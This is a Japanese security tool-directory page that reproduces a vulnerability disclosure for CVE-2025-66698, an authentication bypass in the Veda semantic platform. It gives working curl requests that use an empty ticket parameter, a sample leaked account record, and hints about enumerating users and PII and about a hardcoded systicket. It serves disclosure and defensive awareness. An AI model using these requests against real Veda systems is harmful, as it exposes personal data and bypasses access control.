Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-66698 | Kitploit
ツール/GitHubGitHub/perunchess/cve-2025-66698
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集認証
GitHubperunchess/cve-2025-66698

CVE-2025-66698

リポジトリを見る
7ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-66698

対象ソフトウェア: Veda (Semantic Machines) v5.4.8 (おそらくそれ以前の全バージョン)。 脆弱性タイプ: 認証バイパス (Authentication Bypass)。 CVE ID: CVE-2025-66698。 概要: システムは ticket パラメータの検証を適切に行っておらず、空文字列を有効なセッションとして扱います。 プロジェクトリンク: Veda (Semantic Machines)

2025年11月18日: 発見と最初のCVEリクエスト。 2026年1月9日: CVE IDが割り当てられました。ベンダーへの連絡を試みました(無視され、削除されました)。 2026年1月13日: ベンダーからの応答がないため、公開開示。

この脆弱性は、コードをレビュー中のセキュリティ調査中に発見されました。コード内の ticket パラメータは空の値をチェックしていません。

影響を受けるAPIエンドポイントの一部:

  1. curl "https://localhost/get_individual?ticket=&uri=cfg:Administrator" -k
  2. curl "https://localhost/get_membership?ticket=&uri=cfg:SuperUser" -k
  3. curl "https://localhost/is_ticket_valid?ticket=" -k (「true」を返す)

列挙できるデフォルトユーザーが多数あります。また、スキームを cfg から v-s などに変更することで、ユーザー、ポリシー、PII(氏名、写真、役職、生年月日、連絡先情報)などを列挙することもできます。

root@kitploit:~
curl "https://localhost/get_individual?ticket=&uri=cfg:VedaSystem" -k
root@kitploit:~
{"@":"cfg:VedaSystem","rdf:type":[{"data":"v-s:Person","type":"Uri"}],"rdfs:isDefinedBy":[{"data":"http://semantic-machines.com/veda/system-account","type":"Uri"}],"rdfs:label":[{"data":"Система  .","lang":"RU","type":"String"},{"data":"System  .","lang":"EN","type":"String"}],"v-s:actualVersion":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:author":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:birthday":[{"data":"2014-03-04T20:00:00Z","type":"Datetime"}],"v-s:created":[{"data":"2025-11-18T14:49:45Z","type":"Datetime"}],"v-s:creator":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:defaultAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:edited":[{"data":"2025-11-18T17:08:59Z","type":"Datetime"}],"v-s:hasAccount":[{"data":"cfg:VedaSystemAccount","type":"Uri"}],"v-s:hasAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:hasAspect":[{"data":"cfg:VedaSystem_aspect","type":"Uri"}],"v-s:hasImage":[{"data":"v-s:DefaultPhoto","type":"Uri"}],"v-s:lastEditor":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:lastName":[{"data":"Система","lang":"RU","type":"String"},{"data":"System","lang":"EN","type":"String"}],"v-s:parentOrganization":[{"data":"cfg:org_Veda","type":"Uri"}],"v-s:updateCounter":[{"data":93,"type":"Integer"}],"v-ui:hasPreferences":[{"data":"cfg:VedaSystem_pref","type":"Uri"}]}

必要なのは、「xxx:xxx」(cfg:xxx、v-s:xxxなど) というエンティティを次々と見つけていくことだけです。これを実現する簡単なbashスクリプトを作成できます。同じ結果を得るためのハードコードされた systicket も存在します。

CVSS 評価:

  • CVSS 3.1 ベクター: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N スコア: 8.6 (High)
  • CVSS 4.0 ベクター: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N スコア: 9.3 (Critical)
ツールをダウンロード